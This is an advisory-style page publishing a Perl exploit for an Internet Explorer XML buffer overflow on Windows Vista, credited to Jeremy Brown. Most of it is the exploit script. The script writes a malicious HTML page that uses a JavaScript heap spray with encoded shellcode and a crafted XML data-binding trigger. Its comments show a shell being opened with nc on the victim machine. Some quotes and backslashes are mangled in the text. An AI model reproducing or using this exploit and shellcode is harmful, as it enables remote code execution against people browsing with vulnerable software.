‘Microsoft Internet Explorer XML Buffer Overflow (Exploit)’

Summary

‘The following exploit utilizes the XML vulnerability in Internet Explorer to execute arbitrary code under Vista.’

Credit:

‘The information has been provided by Jeremy Brown.’


Details

Exploit:
#!/usr/bin/perl
# msie_xmlbof_vista.pl
# Microsoft Internet Explorer XML Buffer Overflow Exploit
# Jeremy Brown [0xjbrown41@gmail.com/jbrownsec.blogspot.com]
#
# I wanted a reliable shell, so I figured I’d whip up something nice for IE7+Vista
# Only the first hundred calculators popping up on the screen is hilarious
# Core/Concepts from other available exploits… Yeah, thanks skylined/krafy/muts
#
# bash$ perl msie_xmlbof_vista.pl
# Usage: msie_xmlbof_vista.pl <filename.html>
# bash$ perl msie_xmlbof_vista.pl /var/www/msie_xmlbof_vista.html
#
# *** Launching IE7 on Vista SP1 with URL: http://192.168.100.105/msie_xmlbof_vista.html ***
#
# bash$ nc 192.168.100.118 30702
# Microsoft Windows [Version 6.0.6001]
# Copyright (c) 2006 Microsoft Corporation. All rights reserved.
#
# C:UsersvistaDesktop>
#
# Enjoy 🙂

$filename = $ARGV[0];
if(!defined($filename))
{

     print ‘Usage: $0 <filename.html>n’;

}

$exploit = ‘<html>’ . ‘n’ . ‘<div id=’msie_xmlbof_vista’>x</div>’ . ‘<script>’ . ‘nn’ .
    ‘var shellcode = unescape(‘%u4343%u4343%u43eb%u5756%u458b%u8b3c%u0554%u0178%u52ea%u528b’ + ‘ . ‘n’ .
    ‘ ‘%u0120%u31ea%u31c0%u41c9%u348b%u018a%u31ee%uc1ff%u13cf%u01ac’ + ‘ . ‘n’ .
    ‘ ‘%u85c7%u75c0%u39f6%u75df%u5aea%u5a8b%u0124%u66eb%u0c8b%u8b4b’ + ‘ . ‘n’ .
    ‘ ‘%u1c5a%ueb01%u048b%u018b%u5fe8%uff5e%ufce0%uc031%u8b64%u3040’ + ‘ . ‘n’ .
    ‘ ‘%u408b%u8b0c%u1c70%u8bad%u0868%uc031%ub866%u6c6c%u6850%u3233’ + ‘ . ‘n’ .
    ‘ ‘%u642e%u7768%u3273%u545f%u71bb%ue8a7%ue8fe%uff90%uffff%uef89’ + ‘ . ‘n’ .
    ‘ ‘%uc589%uc481%ufe70%uffff%u3154%ufec0%u40c4%ubb50%u7d22%u7dab’ + ‘ . ‘n’ .
    ‘ ‘%u75e8%uffff%u31ff%u50c0%u5050%u4050%u4050%ubb50%u55a6%u7934’ + ‘ . ‘n’ .
    ‘ ‘%u61e8%uffff%u89ff%u31c6%u50c0%u3550%u0102%uee77%uccfe%u8950’ + ‘ . ‘n’ .
    ‘ ‘%u50e0%u106a%u5650%u81bb%u2cb4%ue8be%uff42%uffff%uc031%u5650’ + ‘ . ‘n’ .
    ‘ ‘%ud3bb%u58fa%ue89b%uff34%uffff%u6058%u106a%u5054%ubb56%uf347’ + ‘ . ‘n’ .
    ‘ ‘%uc656%u23e8%uffff%u89ff%u31c6%u53db%u2e68%u6d63%u8964%u41e1’ + ‘ . ‘n’ .
    ‘ ‘%udb31%u5656%u5356%u3153%ufec0%u40c4%u5350%u5353%u5353%u5353’ + ‘ . ‘n’ .
    ‘ ‘%u5353%u6a53%u8944%u53e0%u5353%u5453%u5350%u5353%u5343%u534b’ + ‘ . ‘n’ .
    ‘ ‘%u5153%u8753%ubbfd%ud021%ud005%udfe8%ufffe%u5bff%uc031%u5048′ +’ . ‘n’ .
    ‘ ‘%ubb53%ucb43%u5f8d%ucfe8%ufffe%u56ff%uef87%u12bb%u6d6b%ue8d0’ + ‘ . ‘n’ .
    ‘ ‘%ufec2%uffff%uc483%u615c%u89eb’);’ . ‘nn’ . ‘var block = unescape(‘%u0D0D%u0D0D’);’ . ‘nn’ .
    ‘while (block.length < 100000) block += block;’ . ‘n’ . ‘var memory = new Array();’ . ‘n’ . ‘for (i = 0;i < 1000;i++) memory[i] += block + shellcode;’ . ‘nn’ .
    ‘xmlrox = ‘<XML id=microosuck><ie><vista><![CDATA[<img src=http://ਊਊ.microo.suck>]]></vista></ie></XML><SPAN datasrc=#microosuck datafld=vista dataformatas=html>’ .
    ‘<XML id=microosuck></XML><SPAN datasrc=#microosuck datafld=vista dataformatas=html></SPAN></SPAN>’;’ . ‘nn’ . ‘mssox = document.getElementById(‘msie_xmlbof_vista’);’ .
    ‘n’ . ‘mssox.innerHTML = xmlrox;’ . ‘nn’ . ‘</script>’ . ‘n’ . ‘</html>’;

     open(FILE, ‘>’ . $filename);
     print FILE $exploit;
     close(FILE);

exit;’

Categories: Exploits